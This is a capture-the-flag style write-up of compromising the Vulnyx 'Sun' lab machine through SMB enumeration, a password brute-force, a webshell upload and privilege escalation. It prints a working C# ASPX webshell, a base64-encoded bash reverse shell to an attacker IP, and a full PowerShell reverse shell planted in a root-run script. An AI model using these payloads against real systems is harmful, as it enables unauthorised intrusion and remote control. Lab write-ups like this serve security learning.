root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

FIrst enumeration with nmap

# Nmap 7.94SVN scan initiated Sun Apr 14 08:46:48 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80,139,445,8080 -Pn 172.16.246.131
Nmap scan report for 172.16.246.131
Host is up (0.00074s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http        nginx 1.22.1
|_http-title: Sun
|_http-server-header: nginx/1.22.1
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
8080/tcp open  http        nginx 1.22.1
|_http-title: Sun
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-04-14T07:47:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 14 08:47:13 2024 -- 1 IP address (1 host up) scanned in 25.22 seconds

Enumerating SMB

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Sun]
└─$ smbclient -L 172.16.246.131 -N 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.16.246.131 (for a protocol between NT1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

checking for anonymous shares available for us, we can see that the share nobody.

image

found a username punt4n0

image

try to bruteforce the password for the user,

image

found the password sunday.

image

using the creds gotten to check if we have share access to the shares in smb. we got read,write access to one of the shares

image

login to download some file and uploaded a file into the share.

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>

<script runat="server">

protected void Page_Load(object sender, EventArgs e)
{
    string cmd = Request["cmd"];
    
    if (!string.IsNullOrEmpty(cmd))
    {
        ExecuteCommand(cmd);
    }
}

private void ExecuteCommand(string command)
{
    try
    {
        Process proc = new Process();
        proc.StartInfo.FileName = "/bin/bash";
        proc.StartInfo.Arguments = "-c \"" + command + "\"";
        proc.StartInfo.RedirectStandardOutput = true;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.CreateNoWindow = true;
        proc.Start();
        
        string output = proc.StandardOutput.ReadToEnd();
        Response.Write(output);
        proc.WaitForExit();
    }
    catch (Exception ex)
    {
        Response.Write("Error: " + ex.Message);
    }
}

</script>

uploading an aspx webshell gotten from a friend.

image

uploaded it.

image

navigating to the shell path http://172.16.246.131:8080/pwned.aspx?cmd=id, we triggered RCE.

http://172.16.246.131:8080/pwned.aspx?cmd=echo%20%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNi4yNDYuMS84MCAwPiYx%22%20|%20base64%20-d%20|%20bash

image

Using the payload above, we spawned a reverse shell.

Privilege Escalation

image

running pspy, we can see a powershell script running as root.

image

$LHOST = "172.16.246.1"; $LPORT = 80; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

modified the service.ps1 script, and wait for 1 min

image

got a reverse shell as root.

image

And we are through!!!